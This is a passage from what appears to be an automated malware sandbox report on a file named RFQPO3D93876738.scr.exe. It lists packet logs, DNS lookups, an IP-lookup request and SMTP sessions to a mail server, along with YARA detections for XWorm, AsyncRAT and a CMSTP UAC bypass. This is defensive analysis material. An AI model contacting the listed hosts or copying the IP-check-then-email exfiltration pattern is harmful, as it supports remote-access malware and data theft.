Jul 22, 2024 17:52:28.750577927 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.750591040 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.750602961 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.750617981 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.750629902 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.750653028 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.750694990 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.750706911 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.750719070 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.750750065 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.750761986 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.750785112 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.750847101 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.750864983 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.750878096 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.750910044 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.750922918 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.750962973 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.751045942 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.751059055 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.751070976 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.751110077 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.751121998 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.751176119 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.751260996 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.751274109 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.751296043 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.751416922 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.751430988 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.751485109 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.751498938 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.751559973 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.751621962 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.751635075 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.751646996 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.751748085 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.751760960 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.751914024 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.751982927 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.755209923 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.755319118 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.755382061 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.755397081 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.755422115 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.755486012 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.755500078 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.755513906 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.755733967 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.755759001 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.755804062 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.755815983 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.755860090 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.755917072 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.755969048 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.756023884 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.756083965 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.756097078 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.756130934 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.756197929 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.756212950 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.756305933 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.756320000 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.756334066 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.756560087 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.756572962 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.756586075 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.756612062 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.756624937 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.756638050 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.756654024 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.756666899 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.756691933 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.756705999 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.756803989 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.756815910 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.756884098 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.756938934 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.757091999 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.757106066 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.757145882 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.757159948 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.757214069 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.757230043 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.757266045 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.757278919 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.757289886 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.757306099 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.757368088 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.757380962 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.757394075 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.757409096 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.757421970 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.757514954 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.757529020 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.757541895 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.757556915 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.757570028 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.757582903 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.757596016 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.757621050 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.757632971 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.757664919 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.757678986 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.757692099 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.757707119 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.757766008 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.757792950 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.757807016 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.757819891 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.757833004 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.757846117 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.757917881 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.757930994 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.757944107 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.757957935 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.757970095 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.757982016 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.757996082 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.758008003 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.758022070 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.758033991 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.758099079 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.758112907 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.758125067 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.758136988 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.758151054 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.758240938 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.758254051 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.758265972 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.758277893 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.758290052 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.758304119 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.758318901 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.758331060 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.758407116 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.758420944 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.758431911 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.758444071 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.758456945 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.758471012 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.758482933 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.758497953 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.758512020 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.758526087 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.758538008 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.758549929 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.758563042 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.759552002 CEST	587	49716	51.195.88.199	192.168.2.7
Jul 22, 2024 17:52:28.760822058 CEST	49716	587	192.168.2.7	51.195.88.199
Jul 22, 2024 17:52:28.760910988 CEST	49716	587	192.168.2.7	51.195.88.199
Jul 22, 2024 17:52:28.760910988 CEST	49716	587	192.168.2.7	51.195.88.199
Jul 22, 2024 17:52:28.761007071 CEST	49716	587	192.168.2.7	51.195.88.199
Jul 22, 2024 17:52:28.761007071 CEST	49716	587	192.168.2.7	51.195.88.199
Jul 22, 2024 17:52:28.761046886 CEST	49716	587	192.168.2.7	51.195.88.199
Jul 22, 2024 17:52:28.761115074 CEST	49716	587	192.168.2.7	51.195.88.199
Jul 22, 2024 17:52:28.761115074 CEST	49716	587	192.168.2.7	51.195.88.199
Jul 22, 2024 17:52:28.761154890 CEST	49716	587	192.168.2.7	51.195.88.199
Jul 22, 2024 17:52:28.761154890 CEST	49716	587	192.168.2.7	51.195.88.199
Jul 22, 2024 17:52:28.762729883 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.762746096 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.762758970 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.762774944 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.762787104 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.762904882 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.762917995 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.762959003 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.763020992 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.763371944 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.763386965 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.763398886 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.763411045 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.763425112 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.763437986 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.763451099 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.763463020 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.763474941 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.763489008 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.763501883 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.763515949 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.763528109 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.763540983 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.763554096 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.763566017 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.763595104 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.763607979 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.763622046 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.763633966 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.763647079 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.763659954 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.763673067 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.763684034 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.763710022 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.763722897 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.763736010 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.763771057 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.763786077 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.763799906 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.763812065 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.763835907 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.763849020 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.763861895 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.763878107 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.765775919 CEST	587	49716	51.195.88.199	192.168.2.7
Jul 22, 2024 17:52:28.766005039 CEST	587	49716	51.195.88.199	192.168.2.7
Jul 22, 2024 17:52:28.766021013 CEST	587	49716	51.195.88.199	192.168.2.7
Jul 22, 2024 17:52:28.766033888 CEST	587	49716	51.195.88.199	192.168.2.7
Jul 22, 2024 17:52:28.766047001 CEST	587	49716	51.195.88.199	192.168.2.7
Jul 22, 2024 17:52:28.811305046 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.811564922 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.859371901 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.947410107 CEST	587	49716	51.195.88.199	192.168.2.7
Jul 22, 2024 17:52:28.998157024 CEST	49716	587	192.168.2.7	51.195.88.199
Jul 22, 2024 17:52:29.307374001 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:29.357506037 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:29.390372992 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:29.395322084 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:29.517720938 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:29.519706011 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:29.524651051 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:29.647015095 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:29.649245977 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:29.654017925 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:29.797292948 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:29.798533916 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:29.804086924 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:29.928031921 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:29.932987928 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:29.938034058 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:29.938185930 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:29.938214064 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:29.938241959 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:29.938271999 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:29.938299894 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:30.069750071 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:30.073337078 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:30.078505993 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:30.203687906 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:30.208043098 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:30.213166952 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:30.365432024 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:30.366035938 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:30.374128103 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:30.497236013 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:30.498013020 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:30.505247116 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:30.627590895 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:30.653489113 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:30.654544115 CEST	49704	7011	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:30.654580116 CEST	49716	587	192.168.2.7	51.195.88.199

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 22, 2024 17:52:19.563695908 CEST	56424	53	192.168.2.7	1.1.1.1
Jul 22, 2024 17:52:19.649776936 CEST	53	56424	1.1.1.1	192.168.2.7
Jul 22, 2024 17:52:21.333957911 CEST	57462	53	192.168.2.7	1.1.1.1
Jul 22, 2024 17:52:21.346837044 CEST	53	57462	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 22, 2024 17:52:19.563695908 CEST	192.168.2.7	1.1.1.1	0xd1f	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Jul 22, 2024 17:52:21.333957911 CEST	192.168.2.7	1.1.1.1	0x48d	Standard query (0)	s82.gocheapweb.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jul 22, 2024 17:52:12.125121117 CEST	1.1.1.1	192.168.2.7	0x2c75	No error (0)	bg.microsoft.map.fastly.net	199.232.210.172	A (IP address)	IN (0x0001)	false
Jul 22, 2024 17:52:12.125121117 CEST	1.1.1.1	192.168.2.7	0x2c75	No error (0)	bg.microsoft.map.fastly.net	199.232.214.172	A (IP address)	IN (0x0001)	false
Jul 22, 2024 17:52:19.649776936 CEST	1.1.1.1	192.168.2.7	0xd1f	No error (0)	api.ipify.org	104.26.12.205	A (IP address)	IN (0x0001)	false
Jul 22, 2024 17:52:19.649776936 CEST	1.1.1.1	192.168.2.7	0xd1f	No error (0)	api.ipify.org	104.26.13.205	A (IP address)	IN (0x0001)	false
Jul 22, 2024 17:52:19.649776936 CEST	1.1.1.1	192.168.2.7	0xd1f	No error (0)	api.ipify.org	172.67.74.152	A (IP address)	IN (0x0001)	false
Jul 22, 2024 17:52:21.346837044 CEST	1.1.1.1	192.168.2.7	0x48d	No error (0)	s82.gocheapweb.com	51.195.88.199	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ipify.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49706	104.26.12.205	443	7660	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-22 15:52:20 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-07-22 15:52:20 UTC	211	IN	HTTP/1.1 200 OK Date: Mon, 22 Jul 2024 15:52:20 GMT Content-Type: text/plain Content-Length: 11 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8a7498e8aaad42e7-EWR
2024-07-22 15:52:20 UTC	11	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Jul 22, 2024 17:52:22.190606117 CEST	587	49709	51.195.88.199	192.168.2.7	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Mon, 22 Jul 2024 15:52:22 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Jul 22, 2024 17:52:22.201827049 CEST	49709	587	192.168.2.7	51.195.88.199	EHLO 910646
Jul 22, 2024 17:52:22.546407938 CEST	587	49709	51.195.88.199	192.168.2.7	250-s82.gocheapweb.com Hello 910646 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Jul 22, 2024 17:52:22.546627045 CEST	49709	587	192.168.2.7	51.195.88.199	STARTTLS
Jul 22, 2024 17:52:22.857594967 CEST	49709	587	192.168.2.7	51.195.88.199	STARTTLS
Jul 22, 2024 17:52:23.466887951 CEST	49709	587	192.168.2.7	51.195.88.199	STARTTLS
Jul 22, 2024 17:52:23.608915091 CEST	587	49709	51.195.88.199	192.168.2.7	250-s82.gocheapweb.com Hello 910646 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Jul 22, 2024 17:52:23.611303091 CEST	587	49709	51.195.88.199	192.168.2.7	250-s82.gocheapweb.com Hello 910646 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Jul 22, 2024 17:52:23.613379002 CEST	587	49709	51.195.88.199	192.168.2.7	250-s82.gocheapweb.com Hello 910646 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Jul 22, 2024 17:52:23.813628912 CEST	587	49709	51.195.88.199	192.168.2.7	220 TLS go ahead
Jul 22, 2024 17:52:26.863287926 CEST	587	49716	51.195.88.199	192.168.2.7	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Mon, 22 Jul 2024 15:52:26 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Jul 22, 2024 17:52:26.863461018 CEST	49716	587	192.168.2.7	51.195.88.199	EHLO 910646
Jul 22, 2024 17:52:27.047066927 CEST	587	49716	51.195.88.199	192.168.2.7	250-s82.gocheapweb.com Hello 910646 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Jul 22, 2024 17:52:27.047205925 CEST	49716	587	192.168.2.7	51.195.88.199	STARTTLS
Jul 22, 2024 17:52:27.233771086 CEST	587	49716	51.195.88.199	192.168.2.7	220 TLS go ahead

Target ID:	0
Start time:	11:52:05
Start date:	22/07/2024
Path:	C:\Users\user\Desktop\RFQPO3D93876738.scr.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\RFQPO3D93876738.scr.exe"
Imagebase:	0x2422b270000
File size:	1'150'463 bytes
MD5 hash:	F36B1D0AC09E4C4B382FB055192AD8DC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1554585677.000002422D352000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1554585677.000002422D096000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1554585677.000002422D096000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	11:52:05
Start date:	22/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
